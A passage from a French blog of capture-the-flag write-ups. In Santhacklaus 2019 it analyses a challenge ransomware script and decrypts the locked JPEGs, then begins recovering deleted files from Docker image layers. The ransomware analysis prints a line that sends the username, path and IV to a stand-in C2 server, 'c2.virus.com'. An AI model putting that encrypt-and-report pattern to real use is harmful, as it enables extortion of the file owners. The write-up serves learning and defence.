<h3>Fonction <code>lock_file</code></h3>
<p>Cette fonction utilise la librairie python <code>hashlib</code> (<a href="https://docs.python.org/3/library/hashlib.html">https://docs.python.org/3/library/hashlib.html</a>) et <code>Crypto</code> (<a href="https://www.dlitz.net/software/pycrypto/">https://www.dlitz.net/software/pycrypto/</a>).</p>
<p>La première permet l'utilisation de hash. Ici, celui utilisé est le condensat <code>md5</code> du nom d'utilisateur courant. Cette valeur est ensuite utilisée comme clé de chiffrement. Le chiffrement est donc défini de la manière suivante :</p>
<ul>
<li>clé : hash <code>md5</code> de <code>get_username</code></li>
<li>algorithme : <code>1</code> qui correspond au mode <code>AES_ECB</code></li>
<li>longueur de bloc : 16 octets (valeur par défaut)</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span>
<span class="mi">1</span>
</code></pre></div>
<p>Le schéma suivant illustre le fonctionnement de la méthode <code>ECB</code> :</p>
<p><img alt="https://upload.wikimedia.org/wikipedia/commons/thumb/d/d6/ECB_encryption.svg/601px-ECB_encryption.svg.png" src="https://upload.wikimedia.org/wikipedia/commons/a/a6/Schema_ecb.png"></p>
<p>Cette méthode prend chaque bloc de manière séparée et le chiffre avec la clé définie. Cette méthode est à déconseiller comme les motifs présents dans les données sources seront toujours présents. Elle présente cependant l'avantage de pouvoir déchiffrer seulement une partie des données.</p>
<p>Une variable <code>iv</code> est initié avec 16 octets aléatoires :</p>
<div class="highlight"><pre><span></span><code> <span class="n">iv</span> <span class="o">=</span> <span class="n">get_random_bytes</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
</code></pre></div>
<p>Un fois le chiffrement défini, l'ensemble des paramètres est envoyé à un serveur C2 (Command and Control) (<code>'https://c2.virus.com/'</code>) afin que l'attaquant puisse déchiffrer les fichiers.</p>
<div class="highlight"><pre><span></span><code> <span class="n">params</span> <span class="o">=</span> <span class="p">((</span><span class="s1">'target'</span><span class="p">,</span> <span class="n">username</span><span class="p">),</span> <span class="p">(</span><span class="s1">'path'</span><span class="p">,</span> <span class="n">path</span><span class="p">),</span> <span class="p">(</span><span class="s1">'iv'</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
<span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">C2_URL</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">params</span><span class="p">)</span>
</code></pre></div>
<p>Le fichier source est ensuite ouvert (<code>with open(path, 'rb') as fi:</code>) et le fichier contenant le résultat est créé en ajoutant la nouvelle extension qui est visible dans l'archive (<code>with open(path + '.hacked', 'wb') as fo:</code>).</p>
<p>Le fichier source est lu par bloc de 16 octets et le dernier est rempli de <code>0</code> si jamais sa taille est inférieure.</p>
<div class="highlight"><pre><span></span><code> <span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="k">while</span> <span class="n">block</span><span class="p">:</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">block</span><span class="p">)</span> <span class="o"><</span> <span class="mi">16</span><span class="p">:</span>
<span class="n">block</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="mi">0</span><span class="p">])</span>
</code></pre></div>
<p>Le chiffrement du bloc est initié avec le code suivant :</p>
<div class="highlight"><pre><span></span><code> <span class="n">cipherblock</span> <span class="o">=</span> <span class="n">cip</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">xorbytes</span><span class="p">(</span><span class="n">block</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">cipherblock</span>
<span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cipherblock</span><span class="p">)</span>
</code></pre></div>
<h3>Fonction <code>xorbytes</code></h3>
<p>Avant d'appliquer le chiffrement AES, la fonction suivante est appelée :</p>
<p><code>def xorbytes(a, b)</code></p>
<p>Cette fonction permet de faire l'opération binaire <code>XOR</code> entre deux blocs de données. Ici, <code>block</code> (correspond aux 16 octets lus) et <code>iv</code>. Cette opération mathématique donne la table de vérité suivante :</p>
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
<th>A ⊕ B</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>0</td>
<td>1</td>
<td>1</td>
</tr>
<tr>
<td>1</td>
<td>0</td>
<td>1</td>
</tr>
<tr>
<td>1</td>
<td>1</td>
<td>0</td>
</tr>
</tbody>
</table>
<h3>Méthode de chiffrement finale</h3>
<p>Cependant, la méthode <code>ECB</code> avec application de l'opération <code>XOR</code> comprenant un vecteur d'initialisation (la variable <code>iv</code>) donne en fait le chiffrement <code>AES CBC</code> comme l'illustre le schéma suivant :</p>
<p><img alt="https://upload.wikimedia.org/wikipedia/commons/4/42/Schema_CBC.svg" src="https://upload.wikimedia.org/wikipedia/commons/4/42/Schema_CBC.svg"></p>
<p><em>note : un vecteur d'initialisation est un bloc de bits combiné avec le premier bloc de données. Il permet de rendre le résultat plus aléatoire.</em></p>
<h2>Déchiffrement</h2>
<p>Nous avons donc l'ensemble des informations nécessaires au déchiffrement des fichiers. Les 16 premiers octets sont aléatoires mais nous savons que ces fichiers sont initialement des <code>JPEG</code>. Il faut donc remplacer ce premier bloc avec celui qui correspond au magic number du <code>JPEG</code> : <code>ffd8ffe000104a464946000100000000</code>. La méthode <code>CBC</code> fera le reste du déchiffrement de manière automatique (l'<code>iv</code> peut être aléatoire comme le premier bloc sera remplacé par le magic number).</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
<span class="kn">from</span> <span class="nn">Crypto.Random</span> <span class="kn">import</span> <span class="n">get_random_bytes</span>
<span class="kn">import</span> <span class="nn">hashlib</span><span class="o">,</span> <span class="nn">os</span><span class="o">,</span> <span class="nn">getpass</span><span class="o">,</span> <span class="nn">requests</span>
<span class="k">def</span> <span class="nf">unlock_file</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
<span class="n">hsh</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s1">'md5'</span><span class="p">)</span>
<span class="n">hsh</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">username</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">hsh</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">get_random_bytes</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="n">cip</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="p">(</span><span class="n">fi</span><span class="p">):</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">".hacked"</span><span class="p">,</span><span class="s2">""</span><span class="p">),</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="p">(</span><span class="n">fo</span><span class="p">):</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="sa">b</span><span class="s1">'</span><span class="se">\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x00\x00\x00\x00</span><span class="s1">'</span><span class="p">)</span>
<span class="k">while</span> <span class="n">block</span><span class="p">:</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">block</span><span class="p">)</span> <span class="o"><</span> <span class="mi">16</span><span class="p">:</span>
<span class="n">block</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="mi">0</span><span class="p">])</span>
<span class="n">cipherblock</span> <span class="o">=</span> <span class="n">cip</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">block</span><span class="p">)</span>
<span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cipherblock</span><span class="p">)</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">unlock_files</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
<span class="n">username</span> <span class="o">=</span> <span class="s2">"Jack Sheerack"</span>
<span class="k">for</span> <span class="n">directory</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
<span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
<span class="k">if</span> <span class="n">filename</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'.hacked'</span><span class="p">):</span>
<span class="n">fullpath</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Decrypting'</span><span class="p">,</span> <span class="n">fullpath</span><span class="p">)</span>
<span class="n">unlock_file</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">fullpath</span><span class="p">)</span>
<span class="k">pass</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">unlock_files</span><span class="p">(</span><span class="s2">"vacation pictures"</span><span class="p">)</span>
</code></pre></div>
<p>Le choix du nom d'utilisateur s'est fait par déduction avec le nom du challenge (<code>Jacques</code>). Cependant, des tests avec les autres valeurs présentes ne sont pas très long.</p>
<p>On lance notre script :</p>
<div class="highlight"><pre><span></span><code>$ python3 decrypt.py
Decrypting vacation pictures/DCIM-0536.jpg.hacked
Decrypting vacation pictures/DCIM-0533.jpg.hacked
Decrypting vacation pictures/DCIM-0534.jpg.hacked
Decrypting vacation pictures/DCIM-0535.jpg.hacked
$ tree vacation<span class="se">\ </span>pictures
vacation pictures
├── DCIM-0533.jpg
├── DCIM-0533.jpg.hacked
├── DCIM-0534.jpg
├── DCIM-0534.jpg.hacked
├── DCIM-0535.jpg
├── DCIM-0535.jpg.hacked
├── DCIM-0536.jpg
├── DCIM-0536.jpg.hacked
└── READ_THIS.txt
$ file vacation<span class="se">\ </span>pictures/DCIM-0533.jpg
vacation pictures/DCIM-0533.jpg: JPEG image data, JFIF standard <span class="m">1</span>.00, aspect ratio, density 0x21932, segment length <span class="m">16</span>, thumbnail 230x244
</code></pre></div>
<p>Ok, tout semble bon. On ouvre donc les images à la recherche enfin de notre flag :</p>
<p><img alt="DCIM-0534.jpg" src="https://blog.nlegall.fr/images/santhacklaus/DCIM-0534.jpg"></p>
<p>FLAAAG !</p>
<p><img alt="https://i.giphy.com/media/11sBLVxNs7v6WA/giphy.webp" src="https://i.giphy.com/media/11sBLVxNs7v6WA/giphy.webp"></p>
<p>Très bon challenge pour appréhender la cryptographie et comprendre ces différents modes de fonctionnement.</p>
<p><em>ps : j'ai réussi à le finir et valider ce challenge à 5 minutes de la fin. C'était le stress sur la fin pour réussir à avoir des images valides (pris seulement les 3 premiers octets du <code>JPEG</code> et non les 16).</em></p>Santhacklaus 2019 - Naughty Docker2019-12-31T00:00:00+01:002019-12-31T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-31:/santhacklaus-2019-naughty-docker.html<div class="highlight"><pre><span></span><code>It looks like a naughty developer has been deploying a Docker image on a Santa production server a few days before Christmas. He was in a rush and was not able to properly pass all security checks on the built Docker image. Would be a shame if this image could …</code></pre></div><div class="highlight"><pre><span></span><code>It looks like a naughty developer has been deploying a Docker image on a Santa production server a few days before Christmas. He was in a rush and was not able to properly pass all security checks on the built Docker image. Would be a shame if this image could give you an SSH access to the production server... http://46.30.204.47"
</code></pre></div>
<p>Première étape alors, se rendre sur le site internet indiqué.</p>
<p><img alt="NaughtyDocker1" src="https://blog.nlegall.fr/images/santhacklaus/NaughtyDocker1.png"></p>
<p>On a alors le nom de l'image Docker (<code>santactf/app</code>) ainsi que la commande pour le lancer. Ce que l'on fait de suite :).</p>
<div class="highlight"><pre><span></span><code>$ docker run --rm -p <span class="m">3000</span>:3000 -d santactf/app
Unable to find image <span class="s1">'santactf/app:latest'</span> locally
latest: Pulling from santactf/app
844c33c7e6ea: Pull <span class="nb">complete</span>
ada5d61ae65d: Pull <span class="nb">complete</span>
f8427fdf4292: Pull <span class="nb">complete</span>
f025bafc4ab8: Pull <span class="nb">complete</span>
7a9577c07934: Pull <span class="nb">complete</span>
add4f74c413b: Pull <span class="nb">complete</span>
1ee7a33fb93f: Pull <span class="nb">complete</span>
08ab1881dcea: Pull <span class="nb">complete</span>
96f3027f0dbd: Pull <span class="nb">complete</span>
cb67eac57f41: Pull <span class="nb">complete</span>
bf44330d5df8: Pull <span class="nb">complete</span>
4932e843cace: Pull <span class="nb">complete</span>
f0b9c596601c: Pull <span class="nb">complete</span>
Digest: sha256:621c884f7ddd0351fbb114e0b9c1d4d3b0e309cb5c5efc9ce872fd201af79cad
Status: Downloaded newer image <span class="k">for</span> santactf/app:latest
8c5aff2e1ca7ee420ed7599494d53a3d6fbdeab47f6a034c6c52ea2e6b3ba329
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8c5aff2e1ca7 santactf/app <span class="s2">"docker-entrypoint.s…"</span> <span class="m">24</span> seconds ago Up <span class="m">17</span> seconds <span class="m">0</span>.0.0.0:3000->3000/tcp festive_easley
</code></pre></div>
<p>Ok. On a notre docker de démarrer. Voyant ce que nous pouvons obtenir sur le port 3000 :</p>
<p><img alt="NaughtyDocker2" src="https://blog.nlegall.fr/images/santhacklaus/NaughtyDocker2.png"></p>
<p>Rien de concluant en soit...</p>
<p>Essayons de voir le contenu du docker et le fonctionnement de l'application :</p>
<div class="highlight"><pre><span></span><code><span class="c1"># On se connect directement en root via le -u 0</span>
$ docker <span class="nb">exec</span> -u <span class="m">0</span> -it 8c5aff2e1ca7 bash
root@8c5aff2e1ca7:/home/node# id
<span class="nv">uid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span>
root@8c5aff2e1ca7:/home/node# ls
node_modules package-lock.json package.json server.js
root@8c5aff2e1ca7:/home/node# ls -al
total <span class="m">44</span>
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Dec <span class="m">18</span> <span class="m">20</span>:55 .
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Dec <span class="m">16</span> <span class="m">07</span>:28 ..
-rw-r--r-- <span class="m">1</span> node node <span class="m">220</span> May <span class="m">15</span> <span class="m">2017</span> .bash_logout
-rw-r--r-- <span class="m">1</span> node node <span class="m">675</span> May <span class="m">15</span> <span class="m">2017</span> .profile
drwxr-xr-x <span class="m">45</span> root root <span class="m">4096</span> Dec <span class="m">18</span> <span class="m">20</span>:55 node_modules
-rw-r--r-- <span class="m">1</span> root root <span class="m">12606</span> Dec <span class="m">16</span> <span class="m">23</span>:34 package-lock.json
-rw-r--r-- <span class="m">1</span> root root <span class="m">241</span> Dec <span class="m">16</span> <span class="m">23</span>:34 package.json
-rw-r--r-- <span class="m">1</span> root root <span class="m">458</span> Dec <span class="m">18</span> <span class="m">20</span>:53 server.js
</code></pre></div>
<p>C'est donc une application nodejs qui est lancé. Le fichier principal est donc server.js :</p>
<div class="highlight"><pre><span></span><code><span class="kr">const</span> <span class="nx">fastify</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'fastify'</span><span class="p">)({</span>
<span class="nx">logger</span><span class="o">:</span> <span class="kc">true</span>
<span class="p">});</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">request</span><span class="p">,</span> <span class="nx">reply</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">reply</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Some production Santa CTF app'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="mi">3000</span><span class="p">,</span> <span class="s1">'0.0.0.0'</span><span class="p">,</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">err</span><span class="p">,</span> <span class="nx">address</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">log</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="nx">process</span><span class="p">.</span><span class="nx">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">log</span><span class="p">.</span><span class="nx">info</span><span class="p">(</span><span class="sb">`Server listening on </span><span class="si">${</span><span class="nx">address</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">process</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'SIGTERM'</span><span class="p">,</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="nx">fastify</span><span class="p">.</span><span class="nx">close</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
<span class="nx">process</span><span class="p">.</span><span class="nx">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
</code></pre></div>
<p>C'est juste un serveur web basique affichant la phrase vue plus haut. Rien côté fichier et dans le docker.</p>
<p>Regardons du coup comment ce docker est construit. On voit lors de sa récupération qu'il est composer de 13 couches en tout. N'ayant pas de dockerfile à disposition, la commande <code>docker history</code> peut nous aider à le reconstruire et comprendre l'enchaînement des commandes qui ont permis sa réalisation :</p>
<div class="highlight"><pre><span></span><code>$ docker <span class="nb">history</span> --no-trunc santactf/app:latest
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:ddde36e2209357c424cca26ac5a0b46c2f864be797c053bed700422177ba7261 <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) CMD ["node" "server.js"] 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) USER node 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY file:8b53431519dafa70baa13c0dd04861e8688090bfece040ae71244d2e14a66845 in /home/node/ 458B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c npm ci <span class="m">5</span>.59MB
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY multi:2f093554c78265fc6aeb1cb343015e8e8e7227fee6a0504f55721b9af13a16a6 in /home/node/ 12.8kB </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) WORKDIR /home/node 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) EXPOSE 3000 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) CMD ["node"] 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) ENTRYPOINT ["docker-entrypoint.sh"] 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY file:6781e799bed1693e0357678a6692f346b66879c2248ff055a2ff51cc0a83288b in /usr/local/bin/ 116B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c ln -s /usr/local/bin/node /usr/local/bin/nodejs <span class="o">&&</span> rm /home/node/.bashrc /home/node/.bash_history <span class="o">&&</span> rm -rf /usr/share/prod-common 19B
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="nv">ARCH</span><span class="o">=</span> <span class="o">&&</span> <span class="nv">dpkgArch</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>dpkg --print-architecture<span class="k">)</span><span class="s2">"</span> <span class="o">&&</span> <span class="k">case</span> <span class="s2">"</span><span class="si">${</span><span class="nv">dpkgArch</span><span class="p">##*-</span><span class="si">}</span><span class="s2">"</span> in amd64<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'x64'</span><span class="p">;;</span> ppc64el<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'ppc64le'</span><span class="p">;;</span> s390x<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'s390x'</span><span class="p">;;</span> arm64<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'arm64'</span><span class="p">;;</span> armhf<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'armv7l'</span><span class="p">;;</span> i386<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'x86'</span><span class="p">;;</span> *<span class="o">)</span> <span class="nb">echo</span> <span class="s2">"unsupported architecture"</span><span class="p">;</span> <span class="nb">exit</span> <span class="m">1</span> <span class="p">;;</span> <span class="k">esac</span> <span class="o">&&</span> curl -fsSLO --compressed <span class="s2">"https://nodejs.org/dist/v</span><span class="nv">$NODE_VERSION</span><span class="s2">/node-v</span><span class="nv">$NODE_VERSION</span><span class="s2">-linux-</span><span class="nv">$ARCH</span><span class="s2">.tar.xz"</span> <span class="o">&&</span> curl -fsSLO --compressed <span class="s2">"https://nodejs.org/dist/v</span><span class="nv">$NODE_VERSION</span><span class="s2">/SHASUMS256.txt.asc"</span> <span class="o">&&</span> tar -xJf <span class="s2">"node-v</span><span class="nv">$NODE_VERSION</span><span class="s2">-linux-</span><span class="nv">$ARCH</span><span class="s2">.tar.xz"</span> -C /usr/local --strip-components<span class="o">=</span><span class="m">1</span> --no-same-owner <span class="o">&&</span> rm <span class="s2">"node-v</span><span class="nv">$NODE_VERSION</span><span class="s2">-linux-</span><span class="nv">$ARCH</span><span class="s2">.tar.xz"</span> SHASUMS256.txt.asc <span class="m">67</span>.2MB
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY dir:795933707ce316a3189ec6fd11f015b1acbc4eae6d5f01185625a86edaa2c5c4 in / 18.6kB </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) ENV NODE_VERSION=12.13.1 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c groupadd --gid <span class="m">1000</span> node <span class="o">&&</span> useradd --uid <span class="m">1000</span> --gid node --shell /bin/bash --create-home node 333kB
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="nb">set</span> -ex<span class="p">;</span> apt-get update<span class="p">;</span> apt-get install -y --no-install-recommends autoconf automake bzip2 dpkg-dev file g++ gcc imagemagick libbz2-dev libc6-dev libcurl4-openssl-dev libdb-dev libevent-dev libffi-dev libgdbm-dev libglib2.0-dev libgmp-dev libjpeg-dev libkrb5-dev liblzma-dev libmagickcore-dev libmagickwand-dev libmaxminddb-dev libncurses5-dev libncursesw5-dev libpng-dev libpq-dev libreadline-dev libsqlite3-dev libssl-dev libtool libwebp-dev libxml2-dev libxslt-dev libyaml-dev make patch unzip xz-utils zlib1g-dev <span class="k">$(</span> <span class="k">if</span> apt-cache show <span class="s1">'default-libmysqlclient-dev'</span> <span class="m">2</span>>/dev/null <span class="p">|</span> grep -q <span class="s1">'^Version:'</span><span class="p">;</span> <span class="k">then</span> <span class="nb">echo</span> <span class="s1">'default-libmysqlclient-dev'</span><span class="p">;</span> <span class="k">else</span> <span class="nb">echo</span> <span class="s1">'libmysqlclient-dev'</span><span class="p">;</span> <span class="k">fi</span> <span class="k">)</span> <span class="p">;</span> rm -rf /var/lib/apt/lists/* 562MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c apt-get update <span class="o">&&</span> apt-get install -y --no-install-recommends bzr git mercurial openssh-client subversion procps <span class="o">&&</span> rm -rf /var/lib/apt/lists/* 142MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="nb">set</span> -ex<span class="p">;</span> <span class="k">if</span> ! <span class="nb">command</span> -v gpg > /dev/null<span class="p">;</span> <span class="k">then</span> apt-get update<span class="p">;</span> apt-get install -y --no-install-recommends gnupg dirmngr <span class="p">;</span> rm -rf /var/lib/apt/lists/*<span class="p">;</span> <span class="k">fi</span> <span class="m">7</span>.81MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c apt-get update <span class="o">&&</span> apt-get install -y --no-install-recommends ca-certificates curl netbase wget <span class="o">&&</span> rm -rf /var/lib/apt/lists/* <span class="m">23</span>.2MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="c1">#(nop) CMD ["bash"] 0B </span>
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="c1">#(nop) ADD file:152359c10cf61d80091bfd19e7e1968a538bebebfa048dca0386e35e1e999730 in / 101MB</span>
</code></pre></div>
<p>Ah ! Enfin des choses intéressantes qui remontent. Il faut prendre du bas vers le haut. Les premières commandes mettent à jour le système et installent les dépendances. La suite est plus intéressantes :</p>
<div class="highlight"><pre><span></span><code>/bin/sh -c ln -s /usr/local/bin/node /usr/local/bin/nodejs <span class="o">&&</span> rm /home/node/.bashrc /home/node/.bash_history <span class="o">&&</span> rm -rf /usr/share/prod-common
</code></pre></div>
<p>On remarque la suppression de deux fichiers et d'un dossier. Essayons donc de voir comment on peut récupérer le contenu :).</p>
<p>On cherchant de la documentation sur internet, on tombe sur cet article Medium : https://medium.com/@jessgreb01/digging-into-docker-layers-c22f948ed612. Il nous parle d'un dossier <code>/var/lib/docker/aufs</code>. Cependant, ce dossier n'existe pas sur mon serveur :</p>
<div class="highlight"><pre><span></span><code>$ ls /var/lib/docker -l
total <span class="m">48</span>
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 builder
drwx--x--x <span class="m">4</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 buildkit
drwx------ <span class="m">4</span> root root <span class="m">4096</span> Dec <span class="m">30</span> <span class="m">17</span>:21 containers
drwx------ <span class="m">3</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 image
drwxr-x--- <span class="m">3</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 network
drwx------ <span class="m">35</span> root root <span class="m">4096</span> Dec <span class="m">30</span> <span class="m">17</span>:21 overlay2
drwx------ <span class="m">4</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 plugins
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Dec <span class="m">21</span> <span class="m">18</span>:26 runtimes
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 swarm
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Dec <span class="m">30</span> <span class="m">17</span>:21 tmp
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 trust
drwx------ <span class="m">5</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:48 volumes
</code></pre></div>
<p>Cependant, un dossier <code>overlay2</code> est présent et évoqué en fin d'article comme un possible successeur de AUFS. On vérfie lequel docker utilise :</p>
<div class="highlight"><pre><span></span><code>$ docker info
Client:
Debug Mode: <span class="nb">false</span>
Server:
Containers: <span class="m">2</span>
Running: <span class="m">1</span>
Paused: <span class="m">0</span>
Stopped: <span class="m">1</span>
Images: <span class="m">2</span>
Server Version: <span class="m">19</span>.03.5
Storage Driver: overlay2
</code></pre></div>
<p>Ok, on sait donc qu'il faut non pas chercher sur <code>AUFS</code> mais sur <code>overlay2</code>. La page dans la documentation officielle docker nous aide sur son fonctionnement : https://docs.docker.com/storage/storagedriver/overlayfs-driver/#how-the-overlay2-driver-works.</p>
<p>Il nous faut donc retrouver le dossier <code>prod-common</code> ainsi que les deux fichiers <code>.bashrc</code> et <code>.bash_history</code> dans cette ensemble de dossier. Un find est c'est fait :) :</p>
<div class="highlight"><pre><span></span><code>$ find . -name <span class="s2">".bash_history"</span> <span class="p">|</span> grep node
./beb357bfdfd498ff0fbb507996c034316381dc3a7c163890412f33fc3323c84b/diff/home/node/.bash_history
./71f44852a81b6d28dbf5c6d8d0d64857aa9d00ed5b647c4471c2e3df27cb5855/diff/home/node/.bash_history
$ wc -l ./71f44852a81b6d28dbf5c6d8d0d64857aa9d00ed5b647c4471c2e3df27cb5855/diff/home/node/.bash_history
wc: ./71f44852a81b6d28dbf5c6d8d0d64857aa9d00ed5b647c4471c2e3df27cb5855/diff/home/node/.bash_history: No such device or address
$ wc -l ./beb357bfdfd498ff0fbb507996c034316381dc3a7c163890412f33fc3323c84b/diff/home/node/.bash_history
